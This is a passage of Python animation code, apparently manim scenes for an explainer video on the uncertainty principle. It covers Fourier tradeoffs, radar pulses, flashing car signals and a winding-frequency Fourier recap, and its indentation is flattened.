if self.reflection_distance is not None:
delta_distance = total_distance - self.reflection_distance
point_distances = np.dot(self.direction, arc.points.T)
diffs = point_distances - self.reflection_distance
shift_vals = np.outer(-2*np.maximum(diffs, 0), self.direction)
arc.points += shift_vals
#Check if done
arc_point = arc.get_edge_center(-self.direction)
if np.dot(arc_point, self.direction) < np.dot(self.start_center, self.direction):
self.finished = True
self.arc.fade(1)
def is_finished(self):
return self.finished
class RadarPulse(ContinualAnimation):
CONFIG = {
"n_pulse_singletons" : 8,
"frequency" : 0.05,
"colors" : [BLUE, YELLOW]
}
def __init__(self, *args, **kwargs):
digest_config(self, kwargs)
colors = color_gradient(self.colors, self.n_pulse_singletons)
self.pulse_singletons = [
RadarPulseSingleton(*args, color = color, **kwargs)
for color in colors
]
        pulse_mobjects = VGroup(*[ps.mobject for ps in self.pulse_singletons])
        ContinualAnimation.__init__(self, pulse_mobjects, **kwargs)
def update_mobject(self, dt):
for i, ps in enumerate(self.pulse_singletons):
ps.internal_time = self.internal_time - i*self.frequency
ps.update_mobject(dt)
def is_finished(self):
return all([ps.is_finished() for ps in self.pulse_singletons])
class MultipleFlashes(Succession):
CONFIG = {
"run_time_per_flash" : 1.0,
"num_flashes" : 3,
}
def __init__(self, *args, **kwargs):
digest_config(self, kwargs)
kwargs["run_time"] = self.run_time_per_flash
Succession.__init__(self, *[
Flash(*args, **kwargs)
for x in range(self.num_flashes)
])
class TrafficLight(SVGMobject):
CONFIG = {
"file_name" : "traffic_light",
"height" : 0.7,
"post_height" : 2,
"post_width" : 0.05,
}
def __init__(self, **kwargs):
SVGMobject.__init__(self, **kwargs)
post = Rectangle(
height = self.post_height,
width = self.post_width,
stroke_width = 0,
fill_color = WHITE,
fill_opacity = 1,
)
self.move_to(post.get_top(), DOWN)
self.add_to_back(post)
###################
class MentionUncertaintyPrinciple(TeacherStudentsScene):
def construct(self):
title = TextMobject("Heisenberg Uncertainty Principle")
title.to_edge(UP)
dot_cloud = ProbabalisticDotCloud()
vector_cloud = ProbabalisticVectorCloud(
gaussian_distribution_wrapper_config = {"sigma_x" : 0.2},
center_func = lambda : dot_cloud.gaussian_distribution_wrapper.get_parameters()[0],
)
for cloud in dot_cloud, vector_cloud:
cloud.gaussian_distribution_wrapper.next_to(
title, DOWN, 2*LARGE_BUFF
)
vector_cloud.gaussian_distribution_wrapper.shift(3*RIGHT)
def get_brace_text_group_update(gdw, vect, text, color):
brace = Brace(gdw, vect)
text = brace.get_tex("2\\sigma_{\\text{%s}}"%text, buff = SMALL_BUFF)
group = VGroup(brace, text)
def update_group(group):
brace, text = group
brace.match_width(gdw, stretch = True)
brace.next_to(gdw, vect)
text.next_to(brace, vect, buff = SMALL_BUFF)
group.set_color(color)
return Mobject.add_updater(group, update_group)
dot_brace_anim = get_brace_text_group_update(
dot_cloud.gaussian_distribution_wrapper,
DOWN, "position", dot_cloud.color
)
vector_brace_anim = get_brace_text_group_update(
vector_cloud.gaussian_distribution_wrapper,
UP, "momentum", vector_cloud.color
)
self.add(title)
self.add(dot_cloud)
self.play(
Write(title),
self.teacher.change, "raise_right_hand",
self.get_student_changes(*["pondering"]*3)
)
self.play(
Write(dot_brace_anim.mobject, run_time = 1)
)
self.add(dot_brace_anim)
self.wait()
# self.wait(2)
self.play(
dot_cloud.gaussian_distribution_wrapper.change_parameters,
{"sigma" : 0.1*RIGHT},
run_time = 2,
)
self.wait()
self.add(vector_cloud)
self.play(
FadeIn(vector_brace_anim.mobject)
)
self.add(vector_brace_anim)
self.play(
vector_cloud.gaussian_distribution_wrapper.change_parameters,
{"sigma" : RIGHT},
self.get_student_changes(*3*["confused"]),
run_time = 3,
)
#Back and forth
for x in range(2):
self.play(
dot_cloud.gaussian_distribution_wrapper.change_parameters,
{"sigma" : 2*RIGHT},
vector_cloud.gaussian_distribution_wrapper.change_parameters,
{"sigma" : 0.1*RIGHT},
run_time = 3,
)
self.change_student_modes("thinking", "erm", "sassy")
self.play(
dot_cloud.gaussian_distribution_wrapper.change_parameters,
{"sigma" : 0.1*RIGHT},
vector_cloud.gaussian_distribution_wrapper.change_parameters,
{"sigma" : 1*RIGHT},
run_time = 3,
)
self.wait()
class FourierTradeoff(Scene):
CONFIG = {
"show_text" : True,
"complex_to_real_func" : lambda z : z.real,
"widths" : [6, 0.02, 1],
}
def construct(self):
#Setup axes
time_mean = 4
time_axes = Axes(
x_min = 0,
x_max = 2*time_mean,
x_axis_config = {"unit_size" : 1.5},
y_min = -2,
y_max = 2,
y_axis_config = {"unit_size" : 0.5}
)
time_label = TextMobject("Time")
time_label.scale(1.5)
time_label.next_to(
time_axes.x_axis.get_right(), UP+LEFT,
buff = MED_SMALL_BUFF,
)
time_axes.add(time_label)
time_axes.center().to_edge(UP)
time_axes.x_axis.add_numbers(*list(range(1, 2*time_mean)))
frequency_axes = Axes(
x_min = 0,
x_max = 8,
x_axis_config = {"unit_size" : 1.5},
y_min = -0.025,
y_max = 0.075,
y_axis_config = {
"unit_size" : 30,
"tick_frequency" : 0.025,
},
color = TEAL,
)
frequency_label = TextMobject("Frequency")
frequency_label.scale(1.5)
frequency_label.next_to(
frequency_axes.x_axis.get_right(), UP+LEFT,
buff = MED_SMALL_BUFF,
)
frequency_label.set_color(FREQUENCY_COLOR)
frequency_axes.add(frequency_label)
frequency_axes.move_to(time_axes, LEFT)
frequency_axes.to_edge(DOWN, buff = LARGE_BUFF)
frequency_axes.x_axis.add_numbers()
# Graph information
#x-coordinate of this point determines width of wave_packet graph
width_tracker = ExponentialValueTracker(0.5)
get_width = width_tracker.get_value
def get_wave_packet_function():
factor = 1./get_width()
return lambda t : (factor**0.25)*np.cos(4*TAU*t)*np.exp(-factor*(t-time_mean)**2)
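        # Width bookkeeping (informal sketch): the envelope
        # exp(-factor*(t - time_mean)**2) matches exp(-u**2/(2*sigma_t**2))
        # with sigma_t = sqrt(width/2); its Fourier transform is a Gaussian
        # whose sigma_f scales like 1/sigma_t, so the product sigma_t*sigma_f
        # stays constant as the widths below are animated.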
def get_wave_packet():
graph = time_axes.get_graph(
get_wave_packet_function(),
num_graph_points = 200,
)
graph.set_color(YELLOW)
return graph
time_radius = 10
def get_wave_packet_fourier_transform():
return get_fourier_graph(
frequency_axes,
get_wave_packet_function(),
t_min = time_mean - time_radius,
t_max = time_mean + time_radius,
n_samples = 2*time_radius*17,
complex_to_real_func = self.complex_to_real_func,
color = FREQUENCY_COLOR,
)
wave_packet = get_wave_packet()
wave_packet_update = UpdateFromFunc(
wave_packet,
lambda g : Transform(g, get_wave_packet()).update(1)
)
fourier_graph = get_wave_packet_fourier_transform()
fourier_graph_update = UpdateFromFunc(
fourier_graph,
lambda g : Transform(g, get_wave_packet_fourier_transform()).update(1)
)
arrow = Arrow(
wave_packet, frequency_axes.coords_to_point(
4, frequency_axes.y_max/2,
),
color = FREQUENCY_COLOR,
)
fourier_words = TextMobject("Fourier Transform")
fourier_words.next_to(arrow, LEFT, buff = MED_LARGE_BUFF)
sub_words = TextMobject("(To be explained shortly)")
sub_words.set_color(BLUE)
sub_words.scale(0.75)
sub_words.next_to(fourier_words, DOWN)
#Draw items
self.add(time_axes, frequency_axes)
self.play(ShowCreation(wave_packet, rate_func = double_smooth))
anims = [ReplacementTransform(
wave_packet.copy(), fourier_graph
)]
if self.show_text:
anims += [
GrowArrow(arrow),
Write(fourier_words, run_time = 1)
]
self.play(*anims)
# self.play(FadeOut(arrow))
self.wait()
for width in self.widths:
self.play(
width_tracker.set_value, width,
wave_packet_update,
fourier_graph_update,
run_time = 3
)
if sub_words not in self.mobjects and self.show_text:
self.play(FadeIn(sub_words))
else:
self.wait()
self.wait()
class ShowPlan(PiCreatureScene):
def construct(self):
self.add_title()
words = self.get_words()
self.play_sound_anims(words[0])
self.play_doppler_anims(words[1])
self.play_quantum_anims(words[2])
def add_title(self):
title = TextMobject("The plan")
title.scale(1.5)
title.to_edge(UP)
h_line = Line(LEFT, RIGHT).scale(FRAME_X_RADIUS)
h_line.next_to(title, DOWN)
self.add(title, h_line)
def get_words(self):
trips = [
("sound waves", "(time vs. frequency)", YELLOW),
("Doppler radar", "(distance vs. velocity)", GREEN),
("quantum particles", "(position vs. momentum)", BLUE),
]
words = VGroup()
for topic, tradeoff, color in trips:
word = TextMobject("Uncertainty for", topic, tradeoff)
word[1:].set_color(color)
word[2].scale(0.75)
word[2].next_to(word[1], DOWN, buff = 1.5*SMALL_BUFF)
words.add(word)
words.arrange(DOWN, aligned_edge = LEFT, buff = MED_LARGE_BUFF)
words.to_edge(LEFT)
return words
def play_sound_anims(self, word):
morty = self.pi_creature
wave = FunctionGraph(
lambda x : 0.3*np.sin(15*x)*np.sin(0.5*x),
x_min = 0, x_max = 30,
step_size = 0.001,
)
wave.next_to(word, RIGHT)
rect = BackgroundRectangle(wave, fill_opacity = 1)
rect.stretch(2, 1)
rect.next_to(wave, LEFT, buff = 0)
always_shift(wave, direction=LEFT, rate=5)
wave_fader = UpdateFromAlphaFunc(
wave,
lambda w, a : w.set_stroke(width = 3*a)
)
checkmark = self.get_checkmark(word)
self.add(wave)
self.add_foreground_mobjects(rect, word)
self.play(
Animation(word),
wave_fader,
morty.change, "raise_right_hand", word
)
self.wait(2)
wave_fader.rate_func = lambda a : 1-smooth(a)
self.add_foreground_mobjects(checkmark)
self.play(
Write(checkmark),
morty.change, "happy",
wave_fader,
)
self.remove_foreground_mobjects(rect, word)
self.add(word)
self.wait()
def play_doppler_anims(self, word):
morty = self.pi_creature
radar_dish = RadarDish()
radar_dish.next_to(word, DOWN, aligned_edge = LEFT)
target = Plane()
# target.match_height(radar_dish)
target.next_to(radar_dish, RIGHT, buff = LARGE_BUFF)
always_shift(target, direction = RIGHT, rate = 1.25)
pulse = RadarPulse(radar_dish, target)
checkmark = self.get_checkmark(word)
self.add(target)
self.play(
Write(word),
DrawBorderThenFill(radar_dish),
UpdateFromAlphaFunc(
target, lambda m, a : m.set_fill(opacity = a)
),
morty.change, "pondering",
run_time = 1
)
self.add(pulse)
count = it.count() #TODO, this is not a great hack...
while not pulse.is_finished() and next(count) < 15:
self.play(
morty.look_at, pulse.mobject,
run_time = 0.5
)
self.play(
Write(checkmark),
UpdateFromAlphaFunc(
target, lambda m, a : m.set_fill(opacity = 1-a)
),
FadeOut(radar_dish),
morty.change, "happy"
)
self.wait()
def play_quantum_anims(self, word):
morty = self.pi_creature
dot_cloud = ProbabalisticDotCloud()
gdw = dot_cloud.gaussian_distribution_wrapper
gdw.next_to(word, DOWN, MED_LARGE_BUFF)
gdw.rotate(5*DEGREES)
gdw.save_state()
gdw.scale(0)
checkmark = self.get_checkmark(word)
ish = TextMobject("$\\dots$ish")
ish.next_to(checkmark, RIGHT, -SMALL_BUFF, DOWN)
self.add(dot_cloud)
self.play(
Write(word),
FadeIn(dot_cloud.mobject),
morty.change, "confused",
)
self.play(gdw.restore, run_time = 2)
self.play(Write(checkmark))
self.wait()
self.play(
Write(ish),
morty.change, 'maybe'
)
self.wait(6)
##
def get_checkmark(self, word):
checkmark = TexMobject("\\checkmark")
checkmark.set_color(GREEN)
checkmark.scale(1.25)
checkmark.next_to(word[1], UP+RIGHT, buff = 0)
return checkmark
class StartWithIntuition(TeacherStudentsScene):
def construct(self):
self.teacher_says(
"You already \\\\ have this \\\\ intuition",
bubble_kwargs = {
"height" : 3.5,
"width" : 3,
},
)
self.change_student_modes("pondering", "erm", "maybe")
self.look_at(VectorizedPoint(4*LEFT + 2*UP))
self.wait(5)
class TwoCarsAtRedLight(Scene):
CONFIG = {
"text_scale_val" : 0.75,
}
def construct(self):
self.pull_up_behind()
self.flash_in_sync_short_time()
self.show_low_confidence()
self.flash_in_sync_long_time()
self.show_high_confidence()
def pull_up_behind(self):
#Setup Traffic light
traffic_light = TrafficLight()
traffic_light.move_to(6*RIGHT + 2.5*DOWN, DOWN)
source_point = VectorizedPoint(
traffic_light[2].get_right()
)
screen = Line(ORIGIN, UP)
screen.next_to(source_point, RIGHT, LARGE_BUFF)
red_light = Spotlight(
color = RED,
source_point = source_point,
radius = 0.5,
screen = screen,
num_levels = 20,
opacity_function = lambda r : 1/(10*r**2+1)
)
red_light.fade(0.5)
red_light.rotate(TAU/2, about_edge = LEFT)
self.add(red_light, traffic_light)
#Setup cars
car1, car2 = cars = self.cars = VGroup(*[
Car() for x in range(2)
])
cars.arrange(RIGHT, buff = LARGE_BUFF)
cars.next_to(
traffic_light, LEFT,
buff = LARGE_BUFF, aligned_edge = DOWN
)
car2.pi_creature.set_color(GREY_BROWN)
car1.start_point = car1.get_corner(DOWN+RIGHT)
car1.shift(FRAME_X_RADIUS*LEFT)
#Pull up car
self.add(cars)
self.play(
SwitchOn(
red_light,
rate_func = squish_rate_func(smooth, 0, 0.3),
),
Animation(traffic_light),
self.get_flashes(car2, num_flashes = 3),
MoveCar(
car1, car1.start_point,
run_time = 3,
rate_func = rush_from,
)
)
def flash_in_sync_short_time(self):
car1, car2 = cars = self.cars
#Setup axes
axes = Axes(
x_min = 0,
x_max = 5,
y_min = 0,
y_max = 2,
y_axis_config = {
"tick_frequency" : 0.5,
},
)
axes.x_axis.add_numbers(1, 2, 3)
time_label = TextMobject("Time")
time_label.scale(self.text_scale_val)
time_label.next_to(axes.x_axis.get_right(), DOWN)
y_title = TextMobject("Signal")
y_title.scale(self.text_scale_val)
y_title.next_to(axes.y_axis, UP, SMALL_BUFF)
axes.add(time_label, y_title)
axes.to_corner(UP+LEFT, buff = MED_SMALL_BUFF)
graph = axes.get_graph(
self.get_multispike_function(list(range(1, 4))),
x_min = 0.8,
x_max = 3.8,
)
graph.set_color(YELLOW)
#Label short duration
brace = Brace(Line(
axes.input_to_graph_point(1, graph),
axes.input_to_graph_point(3, graph),
), UP)
text = TextMobject("Short duration observation")
text.scale(self.text_scale_val)
text.next_to(brace, UP, SMALL_BUFF)
text.align_to(
axes.coords_to_point(0.25, 0), LEFT
)
self.play(
self.get_flashes(car1, num_flashes = 2),
self.get_flashes(car2, num_flashes = 2),
LaggedStartMap(FadeIn, VGroup(
axes, time_label, y_title,
))
)
self.play(
self.get_flashes(car1, num_flashes = 3),
self.get_flashes(car2, num_flashes = 3),
ShowCreation(graph, rate_func=linear, run_time = 3)
)
self.play(
self.get_flashes(car1, num_flashes = 10),
self.get_flashes(car2, num_flashes = 10, run_time_per_flash = 0.98),
GrowFromCenter(brace),
Write(text),
)
self.time_axes = axes
self.time_graph = graph
self.time_graph_label = VGroup(
brace, text
)
def show_low_confidence(self):
car1, car2 = cars = self.cars
time_axes = self.time_axes
#Setup axes
frequency_axes = Axes(
x_min = 0,
x_max = 3,
y_min = 0,
y_max = 1.5,
y_axis_config = {
"tick_frequency" : 0.5,
}
)
frequency_axes.next_to(time_axes, DOWN, LARGE_BUFF)
frequency_axes.set_color(LIGHT_GREY)
frequency_label = TextMobject("Frequency")
frequency_label.scale(self.text_scale_val)
frequency_label.next_to(frequency_axes.x_axis.get_right(), DOWN)
frequency_axes.add(
frequency_label,
VectorizedPoint(frequency_axes.y_axis.get_top())
)
frequency_axes.x_axis.add_numbers(1, 2)
frequency_graph = frequency_axes.get_graph(
lambda x : np.exp(-4*(x-1)**2),
x_min = 0,
x_max = 2,
)
frequency_graph.set_color(RED)
peak_point = frequency_axes.input_to_graph_point(
1, frequency_graph
)
#Setup label
label = TextMobject("Low confidence")
label.scale(self.text_scale_val)
label.move_to(peak_point + UP+RIGHT, DOWN)
label.match_color(frequency_graph)
arrow = Arrow(label.get_bottom(), peak_point, buff = 2*SMALL_BUFF)
arrow.match_color(frequency_graph)
self.play(
ReplacementTransform(
self.time_axes.copy(), frequency_axes
),
ReplacementTransform(
self.time_graph.copy(), frequency_graph
),
)
self.play(
Write(label),
GrowArrow(arrow)
)
self.wait()
self.frequency_axes = frequency_axes
self.frequency_graph = frequency_graph
self.frequency_graph_label = VGroup(
label, arrow
)
def flash_in_sync_long_time(self):
time_graph = self.time_graph
time_axes = self.time_axes
frequency_graph = self.frequency_graph
frequency_axes = self.frequency_axes
n_spikes = 12
new_time_graph = time_axes.get_graph(
self.get_multispike_function(list(range(1, n_spikes+1))),
x_min = 0.8,
x_max = n_spikes + 0.8,
)
new_time_graph.match_color(time_graph)
new_frequency_graph = frequency_axes.get_graph(
lambda x : np.exp(-500*(x-1)**2),
x_min = 0,
x_max = 2,
num_anchors = 500,
)
new_frequency_graph.match_color(self.frequency_graph)
def pin_freq_graph_end_points(freq_graph):
freq_graph.points[0] = frequency_axes.coords_to_point(0, 0)
freq_graph.points[-1] = frequency_axes.coords_to_point(2, 0)
self.play(LaggedStartMap(
FadeOut, VGroup(
self.time_graph_label,
self.frequency_graph_label,
self.time_graph,
)
))
self.play(
ApplyMethod(
self.time_axes.x_axis.stretch, 2.5, 0,
{"about_edge" : LEFT},
run_time = 4,
rate_func = squish_rate_func(smooth, 0.3, 0.6),
),
UpdateFromFunc(
self.time_axes.x_axis.tip,
lambda m : m.move_to(
self.time_axes.x_axis.get_right(),
LEFT
)
),
ShowCreation(
new_time_graph,
run_time = n_spikes,
rate_func=linear,
),
ApplyMethod(
frequency_graph.stretch, 0.1, 0,
run_time = n_spikes,
),
UpdateFromFunc(frequency_graph, pin_freq_graph_end_points),
*[
self.get_flashes(car, num_flashes = n_spikes)
for car in self.cars
]
)
self.new_time_graph = new_time_graph
self.new_frequency_graph = new_frequency_graph
def show_high_confidence(self):
#Frequency stuff
arrow = self.frequency_graph_label[1]
label = TextMobject("High confidence")
label.scale(self.text_scale_val)
label.next_to(arrow.get_start(), UP, SMALL_BUFF)
label.match_color(arrow)
frequency_axes = self.frequency_axes
#Time stuff
new_time_graph = self.new_time_graph
brace = Brace(new_time_graph, UP, buff = SMALL_BUFF)
text = TextMobject("Long duration observation")
text.scale(self.text_scale_val)
text.next_to(brace, UP, buff = SMALL_BUFF)
self.play(
FadeIn(label),
GrowArrow(arrow),
*list(map(self.get_flashes, self.cars))
)
self.play(
GrowFromCenter(brace),
Write(text, run_time = 1),
*list(map(self.get_flashes, self.cars))
)
self.play(*[
self.get_flashes(car, num_flashes = 10)
for car in self.cars
])
###
def get_flashes(self, car, colors = [YELLOW, RED], num_flashes = 1, **kwargs):
return AnimationGroup(*[
MultipleFlashes(light, color, num_flashes = num_flashes, **kwargs)
for light, color in zip(car.get_lights(), colors)
])
def get_multispike_function(self, spike_times):
return lambda x : sum([
1.25*np.exp(-100*(x-m)**2)
for m in spike_times
])
class VariousMusicalNotes(Scene):
def construct(self):
freq = 20
# x-coordinate of this point represents log(a)
# where the bell curve component of the signal
# is exp(-a*(x**2))
graph_width_tracker = ExponentialValueTracker(1)
def get_graph():
a = graph_width_tracker.get_value()
return FunctionGraph(
lambda x : np.exp(-a*x**2)*np.sin(freq*x)-0.5,
step_size = 0.001,
)
graph = get_graph()
def graph_update(graph):
graph.points = get_graph().points
graph_update_anim = UpdateFromFunc(graph, graph_update)
def change_width_anim(width, **kwargs):
a = 2.0/(width**2)
return AnimationGroup(
ApplyMethod(graph_width_tracker.set_value, a),
graph_update_anim,
**kwargs
)
change_width_anim(FRAME_X_RADIUS).update(1)
graph_update_anim.update(0)
phrases = [
TextMobject(*words.split(" "))
for words in [
"Very clear frequency",
"Less clear frequency",
"Extremely unclear frequency",
]
]
#Show graphs and phrases
widths = [FRAME_X_RADIUS, 1, 0.2]
for width, phrase in zip(widths, phrases):
brace = Brace(Line(LEFT, RIGHT), UP)
brace.stretch(width, 0)
brace.next_to(graph.get_center(), UP, buff = 1.2)
phrase.next_to(brace, UP)
if width is widths[0]:
                self.play(ShowCreation(graph, rate_func=linear))
self.play(
GrowFromCenter(brace),
Write(phrase, run_time = 1)
)
else:
self.play(
change_width_anim(width),
ReplacementTransform(
VGroup(last_phrase, last_brace),
VGroup(phrase, brace),
rate_func = squish_rate_func(smooth, 0.5, 1),
),
run_time = 2
)
self.wait()
# self.play(*map(FadeOut, [graph, brace, phrase]))
last_phrase = phrase
last_brace = brace
#Talk about correlations
short_signal_words = TextMobject(
"Short", "signal", "correlates",
"with", "wide range", "of frequencies"
)
long_signal_words = TextMobject(
"Only", "wide", "signals", "correlate",
"with a", "short range", "of frequencies"
)
phrases = VGroup(short_signal_words, long_signal_words)
for phrase in phrases:
phrase.scale(0.8)
phrase.set_color_by_tex_to_color_map({
"short" : RED,
"long" : GREEN,
"wide" : GREEN,
}, case_sensitive = False)
phrases.arrange(DOWN)
phrases.to_edge(UP)
long_graph = FunctionGraph(
lambda x : 0.5*np.sin(freq*x),
x_min = -FRAME_WIDTH,
x_max = FRAME_WIDTH,
n_components = 0.001
)
long_graph.set_color(BLUE)
long_graph.next_to(graph, UP, MED_LARGE_BUFF)
self.play(
ShowCreation(long_graph),
*list(map(FadeOut, [last_brace, last_phrase]))
)
self.play(
Write(short_signal_words),
change_width_anim(widths[2])
)
self.play(
long_graph.stretch, 0.35, 0,
long_graph.set_color, GREEN,
run_time = 5,
rate_func = wiggle
)
self.wait()
self.play(
Write(long_signal_words),
change_width_anim(widths[0]),
)
self.play(
long_graph.stretch, 0.95, 0,
long_graph.set_color, average_color(GREEN, BLUE),
run_time = 4,
rate_func = wiggle
)
self.wait()
class CrossOutDefinitenessAndCertainty(TeacherStudentsScene):
def construct(self):
words = VGroup(
TextMobject("Definiteness"),
TextMobject("Certainty"),
)
words.arrange(DOWN)
words.next_to(self.teacher, UP+LEFT)
crosses = VGroup(*list(map(Cross, words)))
self.add(words)
self.play(
self.teacher.change, "sassy",
ShowCreation(crosses[0])
)
self.play(
self.get_student_changes(*3*["erm"]),
ShowCreation(crosses[1])
)
self.wait(2)
class BringInFourierTranform(TeacherStudentsScene):
def construct(self):
fourier = TextMobject("Fourier")
fourier.scale(1.5)
fourier.next_to(self.teacher.get_corner(UP+LEFT), UP, LARGE_BUFF)
fourier.save_state()
fourier.shift(DOWN)
fourier.fade(1)
self.play(
self.teacher.change, "raise_right_hand",
fourier.restore
)
self.change_student_modes("happy", "erm", "confused")
self.look_at(3*LEFT + 2*UP)
self.wait(3)
class LastVideoWrapper(Scene):
def construct(self):
title = TextMobject("Visualizing the Fourier Transform")
title.to_edge(UP)
screen_rect = ScreenRectangle(height = 6)
screen_rect.next_to(title, DOWN)
self.add(title)
self.play(ShowCreation(screen_rect))
self.wait()
class FourierRecapScene(DrawFrequencyPlot):
CONFIG = {
"frequency_axes_config" : {
"x_max" : 10.0,
"x_axis_config" : {
"unit_size" : 0.7,
"numbers_to_show" : list(range(1, 10, 1)),
}
},
"initial_winding_frequency" : 0.1,
}
def construct(self):
self.setup_axes()
self.preview_fourier_plot()
self.wrap_signal_around_circle()
self.match_winding_to_beat_frequency()
self.follow_center_of_mass()
self.draw_fourier_plot()
self.set_color_spike()
def setup_axes(self):
self.remove(self.pi_creature)
time_axes = self.get_time_axes()
time_axes.to_edge(UP, buff = MED_SMALL_BUFF)
time_axes.scale(0.9, about_edge = UP)
frequency_axes = self.get_frequency_axes()
circle_plane = self.get_circle_plane()
self.add(time_axes)
self.set_variables_as_attrs(
time_axes, frequency_axes,
circle_plane
)
def preview_fourier_plot(self):
time_graph = self.graph = self.get_time_graph(
width = 2,
num_graph_points = 200,
)
fourier_graph = self.get_fourier_transform_graph(
time_graph
)
fourier_graph.pointwise_become_partial(fourier_graph, 0.1, 1)
#labels
signal_label = TextMobject("Signal")
fourier_label = TextMobject("Fourier transform")
signal_label.next_to(time_graph, UP, buff = SMALL_BUFF)
fourier_label.next_to(fourier_graph, UP)
fourier_label.match_color(fourier_graph)
self.play(
ShowCreation(time_graph, run_time = 2),
Write(signal_label),
)
self.wait()
self.play(
LaggedStartMap(FadeIn, self.frequency_axes),
ReplacementTransform(
time_graph.copy(),
fourier_graph,
run_time = 2
),
ReplacementTransform(
signal_label.copy(),
fourier_label,
run_time = 2,
rate_func = squish_rate_func(smooth, 0.5, 1)
),
)
self.wait()
self.play(LaggedStartMap(
Indicate, self.frequency_axes.x_axis.numbers,
run_time = 4,
rate_func = wiggle,
))
self.wait()
self.play(*list(map(FadeOut, [
self.frequency_axes, fourier_graph,
signal_label, fourier_label,
])))
self.time_graph = time_graph
self.set_variables_as_attrs(time_graph, fourier_label)
def wrap_signal_around_circle(self):
time_graph = self.time_graph
circle_plane = self.circle_plane
freq = self.initial_winding_frequency
pol_graph = self.get_polarized_mobject(time_graph, freq)
winding_freq_label = self.get_winding_frequency_label()
winding_freq_label.add_to_back(BackgroundRectangle(winding_freq_label))
winding_freq_label.move_to(circle_plane.get_top(), DOWN)
self.add_foreground_mobjects(winding_freq_label)
self.play(
Write(circle_plane, run_time = 1),
ReplacementTransform(
time_graph.copy(), pol_graph,
path_arc = -TAU/4,
run_time_per_flash = 2,
run_time = 2,
),
FadeIn(winding_freq_label),
)
freq = 0.3
self.change_frequency(freq, run_time = 2)
ghost_pol_graph = pol_graph.copy()
self.remove(pol_graph)
self.play(ghost_pol_graph.set_stroke, {"width" : 0.5})
self.play(
*self.get_vector_animations(time_graph),
run_time = 15
)
self.remove(ghost_pol_graph)
self.wait()
def match_winding_to_beat_frequency(self):
self.v_lines_indicating_periods = self.get_v_lines_indicating_periods(0.3)
self.add(self.v_lines_indicating_periods)
for freq in range(1, 6):
self.change_frequency(freq, run_time = 5)
self.play(
*self.get_vector_animations(
self.time_graph,
draw_polarized_graph = False
),
run_time = 10
)
self.wait()
def follow_center_of_mass(self):
com_dot = self.get_center_of_mass_dot()
self.generate_center_of_mass_dot_update_anim()
com_arrow = Arrow(UP+3*RIGHT, ORIGIN)
com_arrow.shift(com_dot.get_center())
com_arrow.match_color(com_dot)
com_words = TextMobject("Center of mass")
com_words.next_to(com_arrow.get_start(), UP)
com_words.match_color(com_arrow)
com_words.add_background_rectangle()
com_dot.save_state()
com_dot.move_to(com_arrow.get_start())
com_dot.fade(1)
self.play(
com_dot.restore,
GrowArrow(com_arrow, rate_func = squish_rate_func(smooth, 0.2, 1)),
Write(com_words),
)
self.wait()
squished_func = squish_rate_func(smooth, 0, 0.2)
self.change_frequency(
4,
added_anims = [
FadeOut(com_arrow, rate_func = squished_func),
FadeOut(com_words, rate_func = squished_func),
],
run_time = 5
)
def draw_fourier_plot(self):
frequency_axes = self.frequency_axes
fourier_label = self.fourier_label
self.change_frequency(0, run_time = 2)
self.play(
FadeIn(frequency_axes),
FadeIn(fourier_label),
)
fourier_graph = self.get_fourier_transform_graph(self.time_graph)
self.get_fourier_graph_drawing_update_anim(fourier_graph)
self.generate_fourier_dot_transform(fourier_graph)
self.change_frequency(5, run_time = 20)
self.wait()
self.change_frequency(7.5, run_time = 10)
self.fourier_graph_drawing_update_anim = Animation(Mobject())
self.fourier_graph = fourier_graph
def set_color_spike(self):
spike_point = self.frequency_axes.input_to_graph_point(
5, self.fourier_graph
)
circle = Circle(color = YELLOW, radius = 0.25)
circle.move_to(spike_point)
circle.save_state()
circle.scale(5)
circle.fade(1)
self.change_frequency(5)
self.play(circle.restore)
self.play(FadeOut(circle))
self.wait()
for x in range(2):
self.change_frequency(5.2, run_time = 3)
self.change_frequency(4.8, run_time = 3)
self.change_frequency(5, run_time = 1.5)
self.wait()
#########
def get_time_graph(self, frequency = 5, width = 2, **kwargs):
# low_x = center-width/2
# high_x = center+width/2
# new_smooth = lambda x : np.clip(smooth((x+0.5)), 0, 1)
# def func(x):
# pure_signal = 0.9*np.cos(TAU*frequency*x)
# factor = new_smooth(x - low_x) - new_smooth(x-high_x)
# return 1 + factor*pure_signal
graph = self.time_axes.get_graph(
lambda x : 1+0.9*np.cos(TAU*frequency*x),
x_min = 0, x_max = width,
**kwargs
)
graph.set_color(YELLOW)
return graph
class RealPartOfInsert(Scene):
def construct(self):
words = TextMobject("(Real part of the)")
words.set_color(RED)
self.add(words)
self.play(Write(words))
self.wait(5)
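# Close-up on the circle plane alone: the center-of-mass vector's length is
# labeled "Strength of frequency", and its angle theta encodes the phase.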
class CenterOfMassDescription(FourierRecapScene):
def construct(self):
self.remove(self.pi_creature)
circle_plane = self.get_circle_plane()
circle_plane.save_state()
circle_plane.generate_target()
circle_plane.target.set_height(FRAME_HEIGHT)
circle_plane.target.center()
circle_plane.target.axes.set_stroke(width = 2)
circle_plane.target.main_lines.set_stroke(width = 2) # "targets" was a typo; main_lines assumed, matching the axes/secondary_lines pattern
circle_plane.target.secondary_lines.set_stroke(width = 1)
start_coords = (0.5, 0.5)
alt_coords = (0.8, 0.8)
com_dot = Dot(color = self.center_of_mass_color)
com_dot.move_to(circle_plane.coords_to_point(*start_coords))
self.add(circle_plane, com_dot)
self.wait()
self.play(
MoveToTarget(circle_plane),
com_dot.move_to,
circle_plane.target.coords_to_point(*start_coords)
)
self.wait()
alt_com_dot = com_dot.copy().move_to(
circle_plane.coords_to_point(*alt_coords)
)
for dot in com_dot, alt_com_dot:
line = Line(ORIGIN, dot.get_center())
line.match_color(com_dot)
angle = line.get_angle()
line.rotate(-angle, about_point = ORIGIN)
brace = Brace(line, UP)
words = brace.get_text("Strength of frequency")
words.add_background_rectangle()
dot.length_label_group = VGroup(line, brace, words)
dot.length_label_group.rotate(angle, about_point = ORIGIN)
line, brace, words = com_dot.length_label_group
self.play(
GrowFromCenter(line),
GrowFromCenter(brace),
FadeIn(words),
)
self.wait()
self.play(
Transform(
com_dot.length_label_group,
alt_com_dot.length_label_group,
),
Transform(com_dot, alt_com_dot),
rate_func = there_and_back,
run_time = 4,
)
#Do rotation
line = com_dot.length_label_group[0]
com_dot.length_label_group.remove(line)
angle = line.get_angle()
arc, alt_arc = [
Arc(
start_angle = 0,
angle = factor*angle,
radius = 0.5,
)
for factor in (1, 2)
]
theta = TexMobject("\\theta")
theta.shift(1.5*arc.point_from_proportion(0.5))
self.play(
FadeOut(com_dot.length_label_group),
Animation(line),
ShowCreation(arc),
Write(theta)
)
self.play(
